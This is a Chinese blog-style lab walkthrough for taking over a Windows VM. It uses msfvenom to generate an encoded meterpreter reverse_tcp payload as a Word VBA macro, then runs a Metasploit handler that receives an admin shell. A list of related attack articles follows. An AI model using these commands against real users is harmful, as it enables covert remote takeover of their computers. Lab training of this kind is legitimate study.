实验环境：Windows虚拟机一台IP地址为192.168.230.4，需安装office，kali Linux虚拟机一台，IP地址192.168.230.10
实验目的：拿下Windows控制权
实验步骤：
一，部署实验环境
1，Windows安装word，配置IP地址
二，使用kali生成payload
1，打开msf生成payload
命令行输入msfconsole也可以打开

msf6 > msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.230.10 LPORT=4444 -a x86 --platform windows-e x86/shikata_ga_nai -i 5 -f vba-exe    生成payload，-p指定payload，LHOST指定本机IP地址作为监听，LPORT为本机监听端口，-a架构 x86架构，--platform平台为Windows，-e指定编码器

打开宏文件
另存为反弹木马
2，进行监听

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp   设置payload
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.230.10    设置监听IP地址
LHOST => 192.168.230.10
msf6 exploit(multi/handler) > set LPORT 4444     监听端口
LPORT => 4444
msf6 exploit(multi/handler) > run   运行监听器

获取到shell
meterpreter > getuid 查看当前用户，已经获取到管理员权限
Server username: DESKTOP-QU8DCA3\admin

【至此，实验完成】

利用word漏洞制作Windows反弹木马相关推荐

1. 计算机批量制作邀请函步骤,如何利用Word批量制作邀请函

   原标题:如何利用Word批量制作邀请函 如何利用Word批量生成邀请函?邀请函除了邀请对象不一样,邀请的模板都是一样的,大量的对象姓名你还在一个个复制到模板吗?小Q教你一招,一键批量制作邀请函. Wo ...

2. 某家园论坛被植入利用ANI漏洞传播QQ盗号木马Trojan-PSW.Win32.QQPass.rj的代码

   endurer 原创 2007-04-09 第1版 该论坛采用phpwind系统,被加入代码: /--- <DIV style="CURSOR: url('hxxp://world** ...

3. 快速复现利用Log4j漏洞启动windows计算器

   了解关于漏洞的描述,可以参考Vulnerability Affecting Multiple Log4j Versions Permits RCE Exploit 根据文章描述,首先下载JDK1.8u ...

4. 利用kali Linux使用meterpreter制作免杀木马测试入侵windows电脑

   前言:常规使用meterpreter制作木马时会被各大杀毒软件所拦截,固本文介绍一下利用meterpreter下的Venom制作免杀木马. 首先安装Venom Venon克隆地址:https://gi ...

5. 利用msfvenom制作windows木马及免杀马

   实验环境:kali(10.250.70.251) Windows  x32位(10.250.70.252) 第一步:确保二者之间的网络能够相互ping通 注意:linux可以ping通windows, ...

6. 经典利用永恒之蓝漏洞对Windows操作系统进行攻击

   利用永恒之蓝对Windows进行攻击 环境搭建:kali.Windows server 2008R2.Windows 7,其中Windows server 2008R2\WIN7为靶机. 首先简单介绍 ...

7. msfconsole之制作windows木马并成功获取shell

   msfconsole之制作windows木马并成功获取shell 一.工具简介     msfconsole 简称 msf 是一款常用的安全测试工具,包含了常见的漏洞利用模块和生成各种木马,其提供了一 ...

8. 中国蚁剑AntSword反制 RCE漏洞复现 windows环境上反弹shell 吊打攻击你的黑客

   中国蚁剑(AntSword) 是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员. WebShell WebShell可以理解为网页中的木马程序,通过植 ...

9. python dos攻击_利用SMB漏洞DoS攻击任何Windows系统

   原标题:利用SMB漏洞DoS攻击任何Windows系统 近日微软报出SMB V1存在漏洞,安全研究员并将此漏洞称作 " SMBLoris ",解释其能够发动拒绝服务(Dos)攻击, ...

最新文章

1. 深度复制_Python 列表切片陷阱：引用、复制与深复制
2. windows 2008 R2下(AD RMS)无法检索证书层次结构的解决方法
3. layui中table监听单元格_layui table表格 监听头删除不请求后台
4. （2.2）HarmonyOS鸿蒙页面跳转
5. ASP.NET Atlas简单控件介绍——Sys.Component基类与Sys.UI.Control基类
6. 用 Flutter 写一个精美的登录页面（最新版）
7. Python基础函数学习笔记(三)
8. Java实现简易四则运算器
9. 软件的发展历史(时间轴)
10. html表格中间有空白,word文档表格中间出现空白怎么解决
11. 使用迅雷下载百度云盘数据
12. 计算机硬件大型作业报告,计算机硬件技术大作业报告 (2).doc
13. java 翻译 go语言_【翻译】go是面向对象语言吗？
14. python怎么隐藏输入法_打开和关闭输入法
15. 2022-2028全球与中国工程项目管理软件市场现状及未来发展趋势
16. J2me xmlReader的轻量级实现
17. Worthington脱氧核糖核酸及相关研究工具
18. string字符串输入
19. 使用VMware 16 安装中标麒麟 7
20. 下图是微型计算机cpu的结构图它由控制器,下图是微型计算机CPU的结构图，它由控制器、（ ）、寄存器等构成。...

热门文章

1. webpack配置代理跨域
2. 【如何学习CAN总线测试】——UDS诊断测试（应用层①）
3. 培训机构财务管理系统的管理模式与价值
4. java实验报告——手机类
5. GB30871-2022正式实施，数字化开票规范化、便捷化
6. Jquery通过submitHandler 实现验证后跳转到别的页面
7. 儿童护眼台灯哪个好？分享国内性价比高的儿童护眼台灯
8. 计算机网络的概念（一）
9. 计算机应用是五年还是三年,计算机应用基础毕业论文
10. progressdialog进度框_使用ProgressDialog创建进度对话框